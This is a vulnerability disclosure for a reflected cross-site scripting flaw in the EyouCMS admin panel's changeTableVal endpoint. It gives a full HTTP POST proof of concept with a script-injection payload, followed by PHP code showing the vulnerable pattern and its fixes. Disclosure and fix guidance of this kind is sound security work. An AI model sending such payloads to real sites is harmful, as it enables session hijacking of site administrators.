Background of Website Reflected Cross-Site Scripting
Influenced Version
<= 1.6.0-UTF8-SP1
Description
Changing the article attribute type in the background is affected by reflected XSS in the POST value "value": when the value contains a non-integer character, the XSS payload is shown in the error reporting message.
POC
POST /cms/eyoucms/login.php?m=admin&c=Index&a=changeTableVal&_ajax=1&lang=cn HTTP/1.1
Host: 127.0.0.1:80
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://127.0.0.1
X-Requested-With: XMLHttpRequest
Referer: http://127.0.0.1/cms/eyoucms/login.php?m=admin&c=ArchivesFlag&a=index&lang=cn
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=lmqk1pcmj5egvt269qo4ijgg82; admin_lang=cn; home_lang=cn; referurl=http%3A%2F%2F127.0.0.1%2Fcms%2Feyoucms%2Findex.php%3Fm%3Duser%26c%3DPay%26a%3Dpay_consumer_details; users_id=1; ENV_IS_UPHTML=0; ENV_LIST_URL=%2Feyoucms%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_draft%26lang%3Dcn; ENV_GOBACK_URL=%2Feyoucms%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_draft%26lang%3Dcn%26keywords%3Dfvg; workspaceParam=switch_map%7CIndex; ENV_IS_UPHTML=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 90

value=%BA0<script>alert(1)</script>&field=status&id_value=1&id_name=id&table=archives_flag
Screenshot
Reported by Srpopty, vulnerability discovered by using Corax.
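The fix pattern for the behaviour described above, as an added example that is not EyouCMS code and not part of the original report. All function names and the JSON response shape are hypothetical; it assumes the rejected "value" is echoed back in the error message, as the description states.

```php
<?php
declare(strict_types=1);
// Added illustration, not EyouCMS code; every function name is hypothetical.

// Vulnerable pattern: the raw POST value is concatenated into the error
// text, so markup in "value" reaches the browser unescaped.
function errorVulnerable(string $value): string
{
    return 'Invalid value: ' . $value;
}

// Fix 1: accept only an integer and reject anything else.
function parseIntegerValue(string $value): ?int
{
    $int = filter_var($value, FILTER_VALIDATE_INT);
    return $int === false ? null : $int;
}

// Fix 2: if the rejected input is echoed into HTML, encode it first.
// ENT_SUBSTITUTE replaces invalid UTF-8 bytes (such as 0xBA here) with
// U+FFFD instead of making htmlspecialchars() return an empty string.
function errorHardenedHtml(string $value): string
{
    return 'Invalid value: '
        . htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Fix 3: for an AJAX caller, return JSON (served as application/json) with
// <, >, &, ' and " hex-escaped so the body is inert even if rendered as HTML.
function errorHardenedJson(string $value): string
{
    $flags = JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT
        | JSON_INVALID_UTF8_SUBSTITUTE | JSON_THROW_ON_ERROR;
    // Hypothetical response shape (code/msg keys are assumptions).
    return json_encode(['code' => 0, 'msg' => 'Invalid value: ' . $value], $flags);
}

// Constructed sample: URL-decoded form of the "value" field from the PoC.
$value = "\xBA0<script>alert(1)</script>";

if (parseIntegerValue($value) === null) {
    echo "vulnerable: ", errorVulnerable($value), PHP_EOL;
    echo "html-safe:  ", errorHardenedHtml($value), PHP_EOL;
    echo "json-safe:  ", errorHardenedJson($value), PHP_EOL;
}
```

The simplest variant of the fix is an error message that does not echo the rejected input at all; the encoding functions matter only where the value must be shown.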